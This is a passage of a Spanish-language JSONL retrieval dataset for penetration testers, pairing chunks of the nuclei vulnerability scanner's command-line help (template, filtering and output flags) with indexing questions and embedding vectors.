-0.03788, -0.0102, 0.04638, -0.02828, 0.04095, 0.01312, -0.0482, 0.06212, 0.06543, -0.01244, -0.03866, 0.01703, -0.02547, -0.02573, -0.01959, -0.02876, -0.0502, 0.02603, 0.09578, -0.03882, -0.067, -0.00237, 0.05253, -0.01373, -0.00996, 0.0027, -0.05426, -0.00056, -0.05038, 0.02913, -0.01251, -0.03481, 0.01369, 0.038, -0.01848, 0.0402, -0.01145, -0.00171, 0.06446, 0.03414, -0.01544, -0.00585, 0.00886, 0.01248, -0.03769, -0.05408, -0.02048, 0.01385, -0.04939, 0.02741, 0.0199, -0.08133, -0.02048, -0.04561, 0.0284, -0.03291, -0.00123, 0.00662, -0.08818, -0.00791, -0.05153, 0.00726, -0.02147, -0.06707, -0.00271, 0.00436, -0.0205, 0.03629, -0.02107]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "TEMPLATES:\n -nt, -new-templates run only new templates added in latest nuclei-templates release\n -ntv, -new-templates-version string[] run new templates added in specific version\n -as, -automatic-scan automatic web scan using wappalyzer technology detection to tags mapping\n -t, -templates string[] list of template or template directory to run (comma-separated, file)\n -turl, -template-url string[] template url or list containing template urls to run (comma-separated, file)\n -ai, -prompt string generate and run template using ai prompt\n -w, -workflows string[] list of workflow or workflow directory to run (comma-separated, file)\n -wurl, -workflow-url string[] workflow url or list containing workflow urls to run (comma-separated, file)\n -validate validate the passed templates to nuclei\n -nss, -no-strict-syntax disable strict syntax check on templates\n -td, -template-display displays the templates content\n -tl list all available templates\n -tgl list all available tags\n -sign signs the templates with the private key defined in NUCLEI_SIGNATURE_PRIVATE_KEY env variable\n -code enable loading code protocol-based templates\n -dut, -disable-unsigned-templates disable running unsigned templates or templates with mismatched signature\n -esc, -enable-self-contained enable loading self-contained templates\n -egm, -enable-global-matchers enable loading global matchers templates\n -file enable loading file templates", "indexar": "con quΓ© puedo generar un anΓ‘lisis de vulnerabilidades usando una plantilla creada por IA?", "v": [-0.03298, 0.15244, -0.16652, -0.13141, 0.06132, -0.01806, 0.02815, -0.06222, -0.11998, -0.16142, 0.05413, -0.04642, -0.0693, 0.06488, -0.04828, -0.02851, 0.00971, -0.17004, 0.07865, -0.0037, -0.07287, -0.09392, -0.09643, -0.13951, -0.09898, -0.00981, -0.08554, -0.02537, -0.00607, -0.06094, -0.0917, 0.02068, 0.0706, -0.01363, -0.05945, 0.0273, -0.06255, 0.05814, 0.05285, 0.12025, 0.03416, 0.038, -0.09747, 0.01413, 0.10523, 0.06781, 0.0068, -0.08565, -0.09589, 0.05778, -0.05308, -0.01597, -0.1065, -0.05928, -0.01527, -0.06028, 0.1777, -0.16067, 0.08101, 0.00746, -0.14276, 0.10535, 0.05783, 0.03907, -0.0135, -0.06882, -0.0999, -0.02403, -0.05238, 0.0724, -0.02236, -0.05203, -0.06539, -0.11019, 0.05784, 0.05667, -0.0181, 0.04527, -0.03435, 0.0622, -0.01602, -0.02254, 0.06191, -0.053, -0.15544, 0.00231, 0.06241, 0.0341, 0.08007, -0.08739, 0.06171, -0.07362, -0.08832, 0.02163, -0.06365, -0.05227, 0.06627, 0.00444, -0.06383, 0.02194, -0.07973, -0.03894, -0.07501, 0.12995, 0.1002, 0.13914, 0.01338, -0.01421, -0.00011, -0.07586, 0.03304, -0.03946, -0.07152, -0.03549, -0.00801, 0.027, -0.01265, 0.00303, 0.01434, 0.00158, 0.06982, -0.04244, -0.01533, -0.00751, -0.03559, 0.03586, 0.02917, 0.07119, -0.0182, -0.04428, -0.02145, -0.04719, -0.09025, -0.02969, -0.03862, -0.00063, 0.04591, -0.0166, -0.07315, -0.04268, -0.0087, 0.0697, 0.05839, 0.07411, 0.00249, 0.04084, -0.0678, -0.13685, -0.10151, 0.01524, 0.01718, -0.0078, -0.0152, 0.05087, -0.10354, 0.01173, -0.02579, -0.04414, -0.04903, 0.06214, 0.05675, 0.04207, -0.04606, 0.06119, 0.02535, -0.02468, -0.02426, -0.01275, 0.11381, 0.07874, -0.00235, 0.01512, 0.09062, -0.05073, 0.09981, -0.03821, 0.00291, -0.04614, -0.02298, -0.03355, -0.00245, -0.08766, 0.00162, 0.03006, -0.01221, -0.03808, 0.06934, 0.04259, 0.09709, 0.03088, -0.01826, 0.02659, 0.03783, 0.02346, 0.06426, -0.04986, 0.07225, -0.03808, -0.02959, -0.04596, -0.00372, -0.02566, -0.02792, 0.01078, 0.07032, 0.02727, -0.10408, -0.00562, 0.03173, 0.04293, 0.05908, 0.00422, 0.08628, -0.06305, -0.0382, 0.03175, -0.00042, 0.00391, -0.00901, -0.01006, 0.0123, 0.03076, 0.05522, 0.0465, -0.04573, 0.06125, -0.07223, -0.04885, 0.03081, 0.03677, 0.04148, 0.02266, -0.01412, -0.01876, -0.00905, -0.01514, -0.0212, 0.03126, 0.00819, 0.00218, 0.00863, 0.03656, -0.08009, -0.08739, 0.01664, -0.06302, -0.05635, 0.02754, -0.03565, -0.06478, -0.04796, 0.06105, 0.04731, -0.09041, 0.06269, -0.04816]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "TEMPLATES:\n -nt, -new-templates run only new templates added in latest nuclei-templates release\n -ntv, -new-templates-version string[] run new templates added in specific version\n -as, -automatic-scan automatic web scan using wappalyzer technology detection to tags mapping\n -t, -templates string[] list of template or template directory to run (comma-separated, file)\n -turl, -template-url string[] template url or list containing template urls to run (comma-separated, file)\n -ai, -prompt string generate and run template using ai prompt\n -w, -workflows string[] list of workflow or workflow directory to run (comma-separated, file)\n -wurl, -workflow-url string[] workflow url or list containing workflow urls to run (comma-separated, file)\n -validate validate the passed templates to nuclei\n -nss, -no-strict-syntax disable strict syntax check on templates\n -td, -template-display displays the templates content\n -tl list all available templates\n -tgl list all available tags\n -sign signs the templates with the private key defined in NUCLEI_SIGNATURE_PRIVATE_KEY env variable\n -code enable loading code protocol-based templates\n -dut, -disable-unsigned-templates disable running unsigned templates or templates with mismatched signature\n -esc, -enable-self-contained enable loading self-contained templates\n -egm, -enable-global-matchers enable loading global matchers templates\n -file enable loading file templates", "indexar": "hay alguna alternativa libre a nuclei que permita usar sus propias plantillas?", "v": [0.09886, 0.07306, -0.19743, -0.05914, 0.00403, -0.0533, 0.0242, -0.16073, -0.13824, -0.09331, 0.00413, -0.01791, 0.01974, 0.05361, -0.03453, -0.09341, -0.01037, -0.15959, 0.14165, 0.00792, -0.14948, -0.091, -0.2266, -0.04772, -0.12948, -0.03333, 0.07294, -0.00941, -0.09074, -0.02188, 0.00412, 0.02354, 0.05888, -0.11968, -0.02307, 0.01113, 0.00853, -0.00253, 0.06789, -0.08598, 0.02669, -0.00384, -0.063, 0.08347, 0.01076, 0.0443, -0.09788, -0.01358, -0.01504, 0.00187, -0.02585, -0.00929, -0.04818, 0.00312, 0.05085, -0.08562, 0.24994, -0.04955, -0.02668, -0.06967, -0.13577, 0.07956, 0.1195, -0.00208, 0.00168, 0.00928, -0.04971, -0.04684, -0.14088, 0.02627, -0.02271, -0.02847, 0.0141, -0.10725, -0.05792, 0.04673, -0.0525, -0.0265, 0.00817, 0.09752, 0.00733, -0.15791, 0.01234, -0.03749, -0.12194, -0.02068, 0.12556, -0.02146, -0.02647, 0.00539, 0.06602, 0.02763, -0.06104, 0.1, -0.03429, -0.05784, -0.02916, 0.14929, 0.10283, 0.07049, 0.09271, 0.01304, -0.05298, 0.03533, 0.03246, 0.02095, 0.0193, -0.06997, 0.01604, -0.00613, -0.01762, -0.0205, -0.01104, -0.05453, -0.05746, 0.04185, 0.01962, -0.00472, -0.06426, -0.09337, 0.00908, -0.03927, 0.06485, -0.06235, -0.01369, -0.01462, -0.01898, 0.09841, -0.05092, 0.02058, -0.06458, -0.02821, -0.07262, -0.0563, -0.12751, 0.00283, 0.00796, -0.05161, 0.04, -0.0586, 0.03692, 0.06423, -0.02171, -0.01867, 0.0163, -0.0551, -0.05626, -0.07181, -0.04253, -0.04704, 0.01761, -0.0211, 0.06737, 0.14454, -0.08805, -0.00735, 0.00095, -0.08203, -0.00235, 0.10905, -0.00667, 0.02157, -0.06111, 0.04647, -0.01985, 0.0102, -0.00418, -0.035, -0.03031, 0.0693, 0.03806, 0.08801, 0.00827, -0.07987, 0.07738, -0.03152, -0.01355, -0.04929, 0.0392, -0.00544, 0.02834, -0.00044, -0.09794, -0.03744, -0.03471, -0.02728, -0.0036, 0.04379, -0.00782, 0.01629, -0.05338, 0.08039, -0.0313, -0.0384, 0.00746, 0.00449, -0.01928, -0.0325, 0.01287, 0.0028, -0.01952, 0.024, -0.02457, -0.0278, 0.05075, 0.00999, -0.11534, 0.03386, 0.01445, 0.05426, 0.05763, -0.03244, 0.086, 0.01883, -0.06548, 0.00646, -0.00418, 0.00572, 0.00091, -0.00025, 0.10453, 0.07542, 0.04845, -0.00793, 0.03544, 0.09274, 0.00836, 0.01427, 0.0365, 0.06861, 0.02666, 0.05861, -0.00812, 0.01112, 0.00837, -0.00712, 0.03158, 0.00041, -0.01916, -0.02686, 0.03187, 0.05789, -0.03729, -0.02197, -0.01221, -0.01907, -0.07783, 0.00726, 0.05565, -0.04048, 0.03203, 0.03533, 0.05258, -0.04518, 0.04199, 0.01156]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "FILTERING:\n -a, -author string[] templates to run based on authors (comma-separated, file)\n -tags string[] templates to run based on tags (comma-separated, file)\n -etags, -exclude-tags string[] templates to exclude based on tags (comma-separated, file)\n -itags, -include-tags string[] tags to be executed even if they are excluded either by default or configuration\n -id, -template-id string[] templates to run based on template ids (comma-separated, file, allow-wildcard)\n -eid, -exclude-id string[] templates to exclude based on template ids (comma-separated, file)\n -it, -include-templates string[] path to template file or directory to be executed even if they are excluded either by default or configuration\n -et, -exclude-templates string[] path to template file or directory to exclude (comma-separated, file)\n -em, -exclude-matchers string[] template matchers to exclude in result\n -s, -severity value[] templates to run based on severity. Possible values: info, low, medium, high, critical, unknown\n -es, -exclude-severity value[] templates to exclude based on severity. Possible values: info, low, medium, high, critical, unknown\n -pt, -type value[] templates to run based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript\n -ept, -exclude-type value[] templates to exclude based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript\n -tc, -template-condition string[] templates to run based on expression condition", "indexar": "quΓ© herramienta puedo usar para filtrar alertas por sus etiquetas o autores?", "v": [0.14902, 0.09244, -0.15362, -0.15837, 0.08756, -0.03899, -0.01904, -0.06024, -0.12788, -0.06789, -0.10375, -0.07948, -0.03377, 0.01055, 0.12674, -0.01458, 0.09015, -0.14243, 0.01901, -0.036, 0.00567, -0.00818, -0.19985, -0.11752, -0.22013, -0.05881, 0.02597, 0.04533, -0.11306, 0.10559, -0.0334, 0.13314, 0.09925, -0.0514, -0.12288, 0.02527, -0.00304, 0.03412, 0.00809, 0.05008, 0.0082, 0.09498, -0.1102, -0.00605, 0.02225, 0.02959, -0.07516, -0.02233, 0.05341, 0.09562, -0.06099, -0.11888, -0.12576, 0.09746, -0.04081, -0.08374, 0.17968, -0.04649, 0.04706, -0.08646, -0.03174, 0.03731, 0.0573, 0.02901, -0.02721, -0.104, 0.03133, -0.02325, -0.12918, 0.05696, -0.00127, -0.03766, 0.08637, 0.00629, 0.05352, 0.0605, -0.00582, -0.04208, 0.10249, 0.0217, 0.06092, -0.06438, -0.00308, 0.00815, -0.03475, -0.12575, 0.1082, -0.12909, -0.0658, -0.13749, -0.07363, 0.01406, -0.00645, -0.02783, 0.0406, 0.00073, 0.10621, -0.03838, 0.01702, 0.06464, 0.12321, -0.08875, 0.01495, 0.08345, -0.02934, -0.0528, -0.02683, -0.06881, 0.03786, -0.04795, -0.03569, 0.0008, -0.01362, -0.0106, -0.01013, 0.08625, 0.04517, -0.0887, 0.02015, -0.0165, 0.01479, -0.0403, -0.10961, -0.06053, 0.12671, 0.00409, -0.02619, 0.0668, -0.01627, -0.05346, -0.05359, 0.04498, -0.0758, -0.04177, -0.0282, 0.0137, -0.01776, -0.08766, -0.03486, -0.0428, 0.00658, 0.02633, -0.02446, -0.04054, 0.00867, 0.00968, -0.02221, -0.08307, -0.11167, -0.00538, 0.072, -0.04532, 0.01167, -0.00678, 0.0081, 0.02633, 0.03141, -0.0518, -0.0588, 0.02168, -0.04836, -0.01396, 0.01042, 0.01521, 0.02426, -0.00968, 0.0723, -0.049, 0.04889, 0.06357, 0.05049, 0.00667, 0.04, -0.05436, 0.04473, -0.0673, -0.04497, 0.04324, 0.01196, -0.04249, -0.03731, 0.0331, -0.06033, -0.06212, 0.01363, -0.00602, 0.03696, -0.03437, 0.0038, 0.0587, -0.02071, 0.04633, 0.01196, -0.04995, -0.00793, -0.04418, -0.019, -0.03469, 0.01386, -0.03818, -0.05978, -0.01215, -0.06432, -0.04699, 0.05064, 0.02783, -0.07956, 0.0354, -0.01275, 0.05008, 0.03992, -0.02236, 0.02484, -0.05646, -0.04616, 0.02823, -0.00746, -0.03245, 0.02141, 0.02576, 0.03027, 0.03253, 0.05845, 0.00722, 0.00655, 0.01164, 0.01699, -0.01099, 0.02208, 0.0083, -0.00655, -0.0411, -0.09076, -0.0211, 0.02578, -0.03219, 0.0497, -0.02345, -0.06147, -0.03132, -0.017, 0.04072, 0.01567, -0.02484, -0.03559, -0.05337, -0.07096, 0.01844, -0.03752, -0.07947, -0.02055, 0.03075, 0.06376, -0.06938, 0.08828, -0.03424]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "FILTERING:\n -a, -author string[] templates to run based on authors (comma-separated, file)\n -tags string[] templates to run based on tags (comma-separated, file)\n -etags, -exclude-tags string[] templates to exclude based on tags (comma-separated, file)\n -itags, -include-tags string[] tags to be executed even if they are excluded either by default or configuration\n -id, -template-id string[] templates to run based on template ids (comma-separated, file, allow-wildcard)\n -eid, -exclude-id string[] templates to exclude based on template ids (comma-separated, file)\n -it, -include-templates string[] path to template file or directory to be executed even if they are excluded either by default or configuration\n -et, -exclude-templates string[] path to template file or directory to exclude (comma-separated, file)\n -em, -exclude-matchers string[] template matchers to exclude in result\n -s, -severity value[] templates to run based on severity. Possible values: info, low, medium, high, critical, unknown\n -es, -exclude-severity value[] templates to exclude based on severity. Possible values: info, low, medium, high, critical, unknown\n -pt, -type value[] templates to run based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript\n -ept, -exclude-type value[] templates to exclude based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript\n -tc, -template-condition string[] templates to run based on expression condition", "indexar": "ΒΏcon quΓ© programa puedo separar las notificaciones segΓΊn su severidad?", "v": [-0.03075, 0.19396, -0.1387, -0.00866, 0.06135, -0.11155, -0.00576, -0.19021, -0.14894, -0.0873, -0.124, 0.00755, 0.03121, -0.11104, 0.03849, 0.04705, 0.01887, -0.07368, 0.05815, 0.0913, 0.03349, -0.04432, 0.07378, -0.0817, -0.04918, -0.00556, 0.03953, 0.05625, -0.01188, -0.04143, 0.02114, -0.01683, 0.09671, -0.02355, -0.06461, 0.1002, 0.00877, -0.02322, -0.08246, -0.05922, 0.00308, -0.02826, -0.00725, -0.04049, 0.05108, -0.05469, -0.14539, 0.03608, -0.0007, -0.0934, -0.04788, 0.01681, -0.05712, 0.04336, -0.05014, -0.01256, 0.0754, -0.00102, 0.10447, 0.0381, 0.01794, 0.01836, 0.08905, -0.07988, 0.08645, -0.03492, 0.02735, 0.05809, 0.00038, -0.00104, -0.06038, -0.09152, -0.00345, 0.00391, 0.07955, 0.10976, -0.04171, 0.01243, 0.13366, -0.09277, 0.00093, 0.02606, 0.07125, 0.0475, -0.01492, -0.02082, 0.02019, -0.04413, -0.05427, -0.11772, 0.03853, 0.01946, -0.01131, 0.06304, 0.0264, 0.01029, 0.07294, 0.05818, -0.00891, 0.12391, 0.03391, -0.07894, -0.09098, 0.04229, -0.03942, 0.1248, 0.09762, -0.05041, 0.04093, -0.02304, -0.06033, -0.04166, -0.06493, -0.07469, -0.15094, 0.05358, -0.07616, -0.06581, 0.04113, 0.02604, -0.05791, -0.00732, 0.02083, 0.05605, 0.12182, -0.06913, -0.01789, 0.15268, -0.02946, 0.07707, -0.00721, 0.04904, -0.03247, -0.04741, -0.07241, 0.04063, -0.00966, 0.00573, 0.02764, -0.09589, 0.06629, 0.03331, 0.03396, 0.0282, 0.05977, 0.00634, -0.00778, -0.10488, -0.0418, 0.04548, 0.0095, -0.02441, 0.03894, -0.01627, -0.00204, -0.04645, 0.03988, -0.1501, -0.03192, 0.05076, -0.06493, 0.03261, -0.05745, -0.02686, 0.0888, -0.08784, -0.00736, -0.00033, 0.12043, 0.0548, -0.06306, 0.03401, 0.02101, -0.08129, -0.06458, -0.08198, 0.02388, -0.04113, 0.05495, 0.02054, -0.07742, 0.0651, -0.0649, -0.08518, -0.04478, -0.02412, -0.10298, -0.02393, 0.02997, 0.06791, -0.06043, 0.07723, -0.02084, -0.02892, 0.00772, -0.1032, -0.00717, -0.03711, 0.04636, -0.02554, -0.07392, -0.06018, -0.00247, -0.01189, 0.05668, 0.03205, -0.04667, 0.05375, -0.01017, 0.10036, 0.04272, -0.06376, 0.08706, -0.01498, -0.05942, -0.02458, 0.05772, -0.00775, 0.03615, 0.0671, 0.01287, 0.05985, 0.04935, -0.0272, -0.00603, 0.01028, 0.03976, 0.02939, 0.08813, 0.11833, -0.04338, 0.05512, 0.00996, -0.03705, 0.07064, 0.03327, -0.00971, -0.07269, -0.02756, -0.06227, 0.04873, 0.09825, 0.01927, -0.02183, -0.04203, -0.01559, -0.05124, 0.05657, -9e-05, -0.08572, -0.00644, 0.0757, 0.07651, -0.05918, 0.07314, -0.0241]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "FILTERING:\n -a, -author string[] templates to run based on authors (comma-separated, file)\n -tags string[] templates to run based on tags (comma-separated, file)\n -etags, -exclude-tags string[] templates to exclude based on tags (comma-separated, file)\n -itags, -include-tags string[] tags to be executed even if they are excluded either by default or configuration\n -id, -template-id string[] templates to run based on template ids (comma-separated, file, allow-wildcard)\n -eid, -exclude-id string[] templates to exclude based on template ids (comma-separated, file)\n -it, -include-templates string[] path to template file or directory to be executed even if they are excluded either by default or configuration\n -et, -exclude-templates string[] path to template file or directory to exclude (comma-separated, file)\n -em, -exclude-matchers string[] template matchers to exclude in result\n -s, -severity value[] templates to run based on severity. Possible values: info, low, medium, high, critical, unknown\n -es, -exclude-severity value[] templates to exclude based on severity. Possible values: info, low, medium, high, critical, unknown\n -pt, -type value[] templates to run based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript\n -ept, -exclude-type value[] templates to exclude based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript\n -tc, -template-condition string[] templates to run based on expression condition", "indexar": "hay alguna aplicaciΓ³n que me permita ejecutar plantillas especΓ­ficas basΓ‘ndome en el tipo de protocolo?", "v": [-0.0208, 0.13328, -0.15998, -0.19647, 0.02527, -0.0904, 0.2025, -0.10759, -0.14049, -0.00701, 0.01241, 0.07969, 0.06278, -0.11035, 0.02609, -0.0403, 0.06808, -0.0579, 0.10451, -0.06971, -0.07482, -0.06324, -0.22263, 0.03746, -0.04541, 0.04691, 0.04361, -0.03758, -0.19206, -0.10374, 0.07538, 0.02199, 0.04606, -0.10384, 0.00415, -0.04898, -0.06967, -0.04112, -0.0887, 0.04685, -0.04704, -1e-05, -0.14112, 0.02535, 0.005, 0.00454, 0.01745, 0.06088, -0.02522, -0.10546, -0.03916, 0.0024, -0.01262, -0.02671, -0.08657, -0.03249, 0.18508, -0.06294, 0.00306, -0.01974, -0.02089, -0.0798, 0.15775, 0.06113, 0.09719, -0.0199, 0.05574, -0.00669, -0.03849, 0.01343, -0.04121, 0.04946, 0.02297, 0.06303, 0.08204, -0.11698, -0.10345, 0.00265, 0.03409, 0.11159, 0.01178, -0.01871, -0.07244, 0.08198, -0.10064, 0.02517, -0.03033, 0.04126, 0.06555, -0.02924, 0.07245, -0.01508, -0.12508, -0.00285, 0.0162, -0.10686, 0.05795, 0.08301, 0.04994, 0.09006, 0.03356, -0.01955, -0.01647, -0.00896, 0.0218, 0.0562, -0.01348, -0.08623, 0.00721, -0.03716, -0.02318, -0.02539, 0.03644, -0.0499, -0.07453, -0.02349, -0.02814, -0.01553, -0.00661, -0.07321, -0.03554, -0.03058, 0.00261, -0.06361, 0.04954, -0.02801, -0.05911, 0.15805, -2e-05, 0.05225, -0.05535, -0.05787, -0.09483, 0.04762, -0.08727, 0.04275, 0.01599, -0.04306, -0.0527, -0.02258, 0.01428, 0.05863, -0.03147, 0.06957, 0.06286, -0.03363, -0.00318, -0.05842, -0.11417, 0.05743, 0.08498, -0.00984, -0.01489, 0.05029, -0.14475, -0.01444, 0.03555, -0.05589, 0.06829, 0.05063, -0.03579, 0.04711, -0.06212, -0.03359, 0.02535, 0.01235, -0.00614, -0.07924, 0.03852, 0.08099, 0.06891, 0.07129, -0.03828, -0.00932, 0.02858, -0.01909, -0.08436, -0.00426, 0.04375, 0.0196, -0.03896, 0.05521, 0.04935, 0.00157, 0.06467, -0.08244, -0.02355, 0.03217, -0.02651, 0.01331, -0.02584, 0.05692, 0.02322, -0.00797, 0.00266, 0.02338, 0.02021, 0.01223, -0.07023, -0.01065, -0.0559, -0.02627, -0.0334, -0.06639, 0.06485, 0.09279, -0.06538, -0.00521, -0.03806, 0.09578, 0.03383, 0.00771, 0.02483, 0.02312, -0.02158, -0.03352, 0.00049, 0.03082, 0.05555, -0.0153, 0.01259, 0.0004, 0.10099, -0.04454, -0.03301, 0.00518, 0.00251, -0.02201, -0.01889, -0.0028, -0.01349, -0.01931, -0.01743, -0.02316, 0.00571, 0.0177, -0.0195, -0.0894, -0.05265, -0.05994, -0.03388, 0.02641, 0.00314, -0.03042, -0.02491, -0.02406, -0.057, -0.00357, 0.00743, -0.04863, 0.00124, 0.03822, 0.06273, -0.04015, 0.04226, -0.06187]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "OUTPUT:\n -o, -output string output file to write found issues/vulnerabilities\n -sresp, -store-resp store all request/response passed through nuclei to output directory\n -srd, -store-resp-dir string store all request/response passed through nuclei to custom directory (default \"output\")\n -silent display findings only\n -nc, -no-color disable output content coloring (ANSI escape codes)\n -j, -jsonl write output in JSONL(ines) format\n -irr, -include-rr -omit-raw include request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only) [DEPRECATED use -omit-raw] (default true)\n -or, -omit-raw omit request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only)\n -ot, -omit-template omit encoded template in the JSON, JSONL output\n -nm, -no-meta disable printing result metadata in cli output\n -ts, -timestamp enables printing timestamp in cli output\n -rdb, -report-db string nuclei reporting database (always use this to persist report data)\n -ms, -matcher-status display match failure status\n -me, -markdown-export string directory to export results in markdown format\n -se, -sarif-export string file to export results in SARIF format\n -je, -json-export string file to export results in JSON format\n -jle, -jsonl-export string file to export results in JSONL(ine) format\n -rd, -redact string[] redact given list of keys from query parameter, request header and body", "indexar": "que programa sirve para detectar vulnerabilidades en webs", "v": [0.06452, 0.01263, -0.18697, -0.24786, 0.07633, -0.0776, -0.06465, -0.05642, 0.04208, -0.07635, 0.03382, -0.06018, -0.139, -0.11281, 0.04568, 0.09638, 0.03226, -0.19587, 0.12688, -0.04047, 0.00605, -0.04798, -0.01322, -0.0773, -0.07091, 0.02952, -0.0146, -0.078, 0.00502, -0.01373, -0.04953, -0.08456, 0.05444, 0.00947, -0.07616, 0.07582, -0.05063, -0.03049, 0.05564, 0.07414, 0.13043, 0.05275, -0.0466, 0.01581, 0.09569, -0.03346, -0.05943, -0.13189, 0.03232, 0.02323, -0.03886, 0.0457, -0.13395, -0.03925, 0.00165, -0.06835, 0.04398, -0.08621, 0.0325, -0.03926, -0.10481, 0.06934, 0.05196, -0.03762, 0.06888, -0.05905, 0.00509, 0.05048, -0.10613, 0.01449, 0.01886, 0.00718, 0.07374, 0.00537, -0.00332, 0.01151, -0.01139, -0.00906, 0.08289, -0.07982, -0.00474, 0.04677, 0.07025, 0.13692, -0.14804, -0.04486, 0.06906, -0.01494, 0.05845, -0.11098, 0.10601, 0.16329, -0.03092, 0.0521, 0.0635, -0.09229, 0.18296, 0.02141, -0.00151, 0.02566, -0.0231, -0.10952, -0.04504, 0.09757, 0.01369, 0.1159, 0.01064, 0.02863, -0.03274, -0.04546, -0.01405, -0.03192, -0.06318, -0.08799, -0.04351, 0.07458, 0.05536, 0.01254, 0.09425, -0.02232, -0.11326, -0.02434, -0.07168, -0.01155, 0.03163, 1e-05, -0.01684, 0.04038, -0.01121, 0.0159, -0.00698, -0.02411, -0.04287, 0.00911, -0.06001, 0.00421, 0.02132, -0.06481, -0.05378, 0.03204, 0.037, 0.07469, 0.00093, 0.06063, 0.01896, 0.01914, 0.00458, -0.02545, -0.07848, 0.05028, 0.00554, 0.03065, -0.09243, 0.01907, -0.08208, -0.03914, -0.0229, -0.01828, -0.04418, 0.04751, -0.03966, 0.05482, -0.01188, -0.0024, 0.09602, -0.01572, 0.0398, 0.05847, 0.1635, 0.07429, -0.01785, 0.08644, 0.07507, -0.09026, -0.0128, -0.0267, 0.0275, -0.03485, 0.03865, -0.05874, -0.0769, -0.01573, 0.0688, 0.00908, -0.02515, 0.00027, -0.01438, 0.03653, 0.03208, -0.00652, 0.00332, -0.05826, -0.03155, 0.06265, 0.05193, 0.02659, -0.00555, -0.01439, 0.03991, -0.06049, -0.09018, -0.02462, -0.01267, 0.00865, 0.0405, 0.11205, 0.02432, -0.0445, 0.06738, 0.09846, 0.00021, -0.01056, 0.06195, -0.03832, -0.08524, -0.06133, 0.00829, 0.06871, 0.00989, 0.04392, -0.0267, -0.06372, 0.01591, 0.06257, 0.02146, -0.05339, -0.00396, -0.02819, 0.06866, 0.02451, 0.03004, -0.06605, -0.03016, -0.0317, -0.01605, -0.08412, -0.0133, 0.00076, -0.01868, -0.05633, -0.01794, 0.03434, 0.02082, -0.0789, 0.0301, -0.02697, -0.01494, -0.01834, 0.00827, -0.00545, -0.08122, 0.05451, 0.03656, -0.06455, 0.0335, 0.0131]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "OUTPUT:\n -o, -output string output file to write found issues/vulnerabilities\n -sresp, -store-resp store all request/response passed through nuclei to output directory\n -srd, -store-resp-dir string store all request/response passed through nuclei to custom directory (default \"output\")\n -silent display findings only\n -nc, -no-color disable output content coloring (ANSI escape codes)\n -j, -jsonl write output in JSONL(ines) format\n -irr, -include-rr -omit-raw include request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only) [DEPRECATED use -omit-raw] (default true)\n -or, -omit-raw omit request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only)\n -ot, -omit-template omit encoded template in the JSON, JSONL output\n -nm, -no-meta disable printing result metadata in cli output\n -ts, -timestamp enables printing timestamp in cli output\n -rdb, -report-db string nuclei reporting database (always use this to persist report data)\n -ms, -matcher-status display match failure status\n -me, -markdown-export string directory to export results in markdown format\n -se, -sarif-export string file to export results in SARIF format\n -je, -json-export string file to export results in JSON format\n -jle, -jsonl-export string file to export results in JSONL(ine) format\n -rd, -redact string[] redact given list of keys from query parameter, request header and body", "indexar": "con que puedo hacer un escaneo de seguridad automΓ‘tico", "v": [-0.13411, 0.00794, -0.19428, -0.06824, -0.08349, -0.0663, -0.14759, -0.07387, -0.16385, -0.00347, -0.16382, -0.03738, 0.05056, -0.07268, 0.01031, 0.07455, 0.04503, 0.01977, -0.00205, 0.21052, 0.05707, -0.07911, -0.01819, -0.02769, 0.07237, 0.08061, -0.04464, 0.14641, -0.19979, 0.02177, -0.02197, 0.14634, 0.09135, -0.02123, -0.0201, 0.00729, 0.1141, -0.02175, 0.08215, 0.03566, -0.03979, 0.00803, -0.05797, -0.1046, 0.15196, 0.01456, 0.03461, 0.00041, 0.01711, -0.05367, -0.03351, -0.11395, -0.04408, -0.14549, -0.00072, -0.0366, 0.15784, 0.02325, 0.05332, -0.14567, -0.11124, 0.05798, 0.07289, 0.09647, -0.09643, 0.03061, 0.05381, 0.04865, 0.01418, -0.00426, 0.01624, 0.03465, 0.03926, 0.06537, -0.02161, -0.12256, -0.06483, 0.00905, 0.01184, 0.06725, -0.05668, 0.04954, -0.06489, -0.05717, -0.07044, -0.06158, -0.05144, -0.05568, -0.03773, 0.05957, 0.05751, -0.00617, 0.07967, 0.03528, 0.05852, 0.02972, 0.07406, -0.02589, -0.07924, 0.00045, 0.06487, -0.14956, -0.09249, 0.13149, 0.08513, -0.01841, -0.01108, 0.06982, 0.01941, -0.01136, -0.04414, 0.08677, -0.07128, -0.05507, -0.06429, 0.04671, -0.00505, -0.02911, 0.09067, 0.09753, -0.03678, -0.07377, -0.01529, -0.03383, 0.06946, -0.03227, -0.04091, 0.06877, 0.00648, -0.01286, 0.05328, 